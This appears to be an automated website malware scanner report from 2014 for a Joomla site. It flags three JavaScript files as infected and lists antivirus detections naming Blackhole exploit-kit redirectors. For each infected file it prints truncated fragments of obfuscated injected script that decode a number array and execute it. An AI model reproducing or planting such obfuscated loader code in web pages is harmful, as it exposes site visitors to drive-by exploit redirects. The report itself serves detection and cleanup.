Malware Scanner report for xn----htbnldid.com

Malicious/Suspicious/Total urls checked: 3/0/6

3 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://xn----htbnldid.com/	200 OK Content-Length: 3309 Content-Type: text/html	clean
http://xn----htbnldid.com/media/system/js/modal.js	200 OK Content-Length: 39305 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var SqueezeBox = { presets: { size: {x: 600, y: 450}, sizeLoading: {x: 200, y: 150}, marginInner: {x: 20, y: 20}, marginImage: {x: 150, y: 200}, handler: false, adopt: null, closeWithOverlay: true, zIndex: 65555, overlayOpacity: 0.7, classWindow: '', classOverlay: '', disableFx: false, onOpen: Class.empty, onClose: Class.empty, onUpdate: Class.empty, onResize: Class.empty, onMove: Class.emp ... 3314 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-688!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir JS/Agent.AI.1 Avast JS:Crypt-A [Trj] Ad-Aware Trojan.JS.Iframe.BJT Ikarus Trojan.Script Rising JS:Hack.Exploit.Script.JS.IframeRef.a!1610720 nProtect Trojan.JS.Iframe.BJT K7AntiVirus Exploit ( 04c554561 ) Emsisoft Trojan.JS.Iframe.BJT (B) Comodo TrojWare.JS.Agent.HJ CAT-QuickHeal JS/BlacoleRef.BA K7GW Exploit ( 04c554561 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.233 TrendMicro HEUR_HTJS.HDJSFN Microsoft Trojan:JS/Redirector.JN Kaspersky Trojan-Downloader.JS.Agent.gqu MicroWorld-eScan Trojan.JS.Iframe.BJT Tencent Unk.Win32.Script.400114 Fortinet JS/Crypt.CAAD!tr TotalDefense JS/BlacoleRef.M Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.rrcam ClamAV Trojan.Blackhole-483 F-Secure Trojan.JS.Iframe.BJT VIPRE Trojan-Downloader.JS.Agent.gup (v) F-Prot JS/Crypted.Y AVG Script/Exploit.Kit Norman Downloader.HIVI Sophos Mal/ScrLd-A GData Trojan.JS.Iframe.BJT Symantec Trojan.Malscript!html Commtouch JS/Crypted.Y AVware Trojan-Downloader.JS.Agent.gup (v) ESET-NOD32 JS/Agent.NEN BitDefender Trojan.JS.Iframe.BJT
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js	200 OK Content-Length: 91668 Content-Type: text/javascript	clean
http://xn----htbnldid.com/components/com_k2/js/k2.js	200 OK Content-Length: 34033 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var $K2 = jQuery.noConflict(); $K2(document).ready(function(){ $K2('#comment-form').submit(function(event){ event.preventDefault(); $K2('#formLog').empty().addClass('formLogLoading'); $K2.ajax({ url: $K2('#comment-form').attr('action'), type: 'post', dataType: 'json', data: $K2('#comment-form').serialize(), success: function(response){ $K2('#formLog').removeClass('formLogLoading').html(response.message); if(typeof(Rec ... 3266 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-687!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir JS/Redirector.PY.1 Avast JS:Crypt-A [Trj] Ad-Aware Trojan.JS.Redirector.BCL Ikarus Trojan.Script Rising JS:Hack.Exploit.Script.JS.IframeRef.a!1610720 nProtect Trojan.JS.Redirector.BCL K7AntiVirus Exploit ( 04c5604b1 ) TrendMicro-HouseCall JS_BLACOLE.AJO Emsisoft Trojan.JS.Redirector.BCL (B) Comodo TrojWare.JS.Agent.HJ CAT-QuickHeal JS/BlacoleRef.BA K7GW Exploit ( 04c5604b1 ) DrWeb JS.IFrame.233 TrendMicro JS_BLACOLE.AJO Microsoft Trojan:JS/Redirector.JN Kaspersky Trojan-Downloader.JS.Agent.gqu Tencent Unk.Win32.Script.400114 MicroWorld-eScan Trojan.JS.Redirector.BCL Fortinet JS/Crypt.CAAD!tr TotalDefense JS/BlacoleRef.M Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.rrcam ClamAV Trojan.Blackhole-483 F-Secure Trojan.JS.Redirector.BCL VIPRE Trojan-Downloader.JS.Agent.gup (v) F-Prot JS/Redir.JX AVG Script/Exploit.Kit Sophos Mal/ScrLd-A GData Trojan.JS.Redirector.BCL Symantec Trojan.Malscript!html Commtouch JS/Redir.JX AVware Trojan-Downloader.JS.Agent.gup (v) ESET-NOD32 JS/Agent.NEN BitDefender Trojan.JS.Redirector.BCL
http://xn----htbnldid.com/media/system/js/caption.js	200 OK Content-Length: 29061 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var JCaption = new Class({ initialize: function(selector) { this.selector = selector; var images = $$(selector); images.each(function(image){ this.createCaption(image); }, this); }, createCaption: function(element) { var caption = document.createTextNode(element.title); var container = document.createElement("div"); var text = document.createElement("p"); var width = element.getAttribute("width"); var align = ... 3155 bytes are skipped ...1$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-682!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1h(1+1*n[j]));}q=ss;e(q);} Antivirus reports: AntiVir JS/Redirector.PB.3 Avast JS:Crypt-A [Trj] Ad-Aware Trojan.JS.Iframe.BJT Ikarus Trojan.Script Rising JS:Hack.Exploit.Script.JS.IframeRef.a!1610720 nProtect Trojan.JS.Iframe.BJT K7AntiVirus Exploit ( 04c55c911 ) TrendMicro-HouseCall JS_BLACOLE.AJP Emsisoft Trojan.JS.Iframe.BJT (B) Comodo TrojWare.JS.Agent.HJ CAT-QuickHeal JS/BlacoleRef.BA K7GW Exploit ( 04c55c911 ) McAfee-GW-Edition JS/Exploit-Blacole.ht DrWeb JS.IFrame.233 TrendMicro JS_BLACOLE.AJP Microsoft Trojan:JS/Redirector.JN Kaspersky Trojan-Downloader.JS.Agent.gqu MicroWorld-eScan Trojan.JS.Iframe.BJT Tencent Unk.Win32.Script.400114 Fortinet JS/Crypt.CAAD!tr TotalDefense JS/BlacoleRef.M Jiangmin Trojan/Script.Gen McAfee JS/Exploit-Blacole.ht NANO-Antivirus Trojan.Script.Agent.rrcam ClamAV Trojan.Blackhole-483 F-Secure Trojan.JS.Iframe.BJT F-Prot JS/Crypted.Y AVG Script/Exploit.Kit Sophos Mal/ScrLd-A GData Trojan.JS.Iframe.BJT Symantec Trojan.Malscript!html Commtouch JS/Crypted.Y AVware Trojan-Downloader.JS.Agent.gup (v) ESET-NOD32 JS/Agent.NEK BitDefender Trojan.JS.Iframe.BJT
http://xn----htbnldid.com/test404page.js	404 Not Found Content-Length: 212 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: xn----htbnldid.com

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:31:26 GMT
Pragma: no-cache
Server: Apache
Content-Length: 3309
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:31:26 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 5d0e164f56aab0c4307f85eca1e152e5=qclp7hrs7uoec7un34j4u0ai13; path=/

...3309 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: xn----htbnldid.com
Referer: http://www.google.com/search?q=xn----htbnldid.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=xn----htbnldid.com

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://xn----htbnldid.com/

Result: xn----htbnldid.com is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for xn----htbnldid.com

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools